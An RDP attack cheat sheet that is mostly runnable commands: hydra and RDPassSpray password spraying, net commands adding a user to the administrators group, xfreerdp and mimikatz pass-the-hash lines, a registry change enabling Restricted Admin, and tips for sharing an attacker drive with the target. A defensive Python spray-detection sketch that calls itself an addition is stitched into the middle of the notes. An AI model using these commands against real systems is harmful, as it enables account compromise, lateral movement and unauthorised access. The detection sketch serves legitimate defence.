# Bruteforce
# https://github.com/xFreed0m/RDPassSpray
# Note: the tool will fail if a password contains spaces
python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]
hydra -V -f -L ./users.txt -P ./passwords.txt rdp -M targets.txt -t 1 -W 3 -c 5
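For the defending side of the spraying commands above, here is an added detection sketch (not part of the original notes or of either tool). It flags a source that fails against many distinct accounts in a short window, rather than counting failures per account. The event tuples, field layout, thresholds and the mapping to Event IDs 4625/4624 are assumptions made for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: (time, source IP, target account, logon succeeded).
# Assumed to be reduced from Windows Security events 4625 (fail) / 4624 (success).
SAMPLE_EVENTS = [
    ("2024-01-10T09:00:00", "10.0.0.50", "alice", False),
    ("2024-01-10T09:00:04", "10.0.0.50", "bob", False),
    ("2024-01-10T09:00:08", "10.0.0.50", "carol", False),
    ("2024-01-10T09:00:12", "10.0.0.50", "dave", False),
    ("2024-01-10T09:00:16", "10.0.0.50", "erin", True),
    # One user mistyping a password twice: must not be flagged as a spray.
    ("2024-01-10T09:05:00", "10.0.0.77", "frank", False),
    ("2024-01-10T09:05:30", "10.0.0.77", "frank", False),
    ("2024-01-10T11:30:00", "10.0.0.77", "frank", True),
]

def detect_spray(events, window=timedelta(minutes=10), min_users=4):
    """Flag sources that fail against >= min_users distinct accounts within `window`.

    Returns {source_ip: {"users": sprayed accounts,
                         "succeeded": accounts that logged on from that source
                                      during or shortly after the spray}}.
    """
    by_src = defaultdict(list)
    for ts, src, user, ok in events:
        by_src[src].append((datetime.fromisoformat(ts), user, ok))

    findings = {}
    for src, rows in by_src.items():
        rows.sort()
        fails = [(t, u) for t, u, ok in rows if not ok]
        start = 0
        for end in range(len(fails)):
            # Slide the left edge so fails[start..end] fits inside the window.
            while fails[end][0] - fails[start][0] > window:
                start += 1
            users = {u for _, u in fails[start:end + 1]}
            if len(users) >= min_users:
                first, last = fails[start][0], fails[end][0]
                # A success from the same source right after a spray needs triage first.
                hits = sorted({u for t, u, ok in rows
                               if ok and first <= t <= last + window})
                findings[src] = {"users": sorted(users), "succeeded": hits}
                break
    return findings

if __name__ == "__main__":
    for src, info in detect_spray(SAMPLE_EVENTS).items():
        print(src, info)
```

A slow spray stretches the interval between attempts, so the window and account threshold need tuning against the environment's lockout policy.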
Connect with known credentials/hash
# net localgroup administrators userx /add
# net localgroup "Remote Management Users" userx /add
rdesktop -g 1600x800 -r disk:tmp=/usr/share/windows-binaries 192.168.30.30 -u pelota -p -g 95%
xfreerdp /u:admin /p:password /cert:ignore /v:10.10.138.3 /workarea /drive:/localdir,share /dynamic-resolution +clipboard
# In case of error (ERRCONNECT_CONNECT_TRANSPORT_FAILED), add this flag: /sec:tls
# Connecting via hash works if Restricted Admin is enabled.
xfreerdp /u:<user> /d:<domain> /pth:<hash> /v:<IP>
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash> /run:"mstsc.exe /restrictedadmin"
# Enable Restricted Admin
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force
/drive:LOCAL_DIRECTORY,SHARE_NAME -- creates a shared drive between the attacking machine and the target. This switch is insanely useful as it allows us to very easily use our toolkit on the remote target, and save any outputs back directly to our own hard drive. In essence, this means that we never actually have to create any files on the target. For example, to share the current directory in a share called share, you could use: /drive:.,share, with the period (.) referring to the current directory.
Once created, the shared drive can be accessed either from the command line as \\tsclient\, or through File Explorer under "This PC".
# Bypass prompt for credentials before you establish a remote desktop connection
# https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remote-desktop-connection-6-prompts-credentials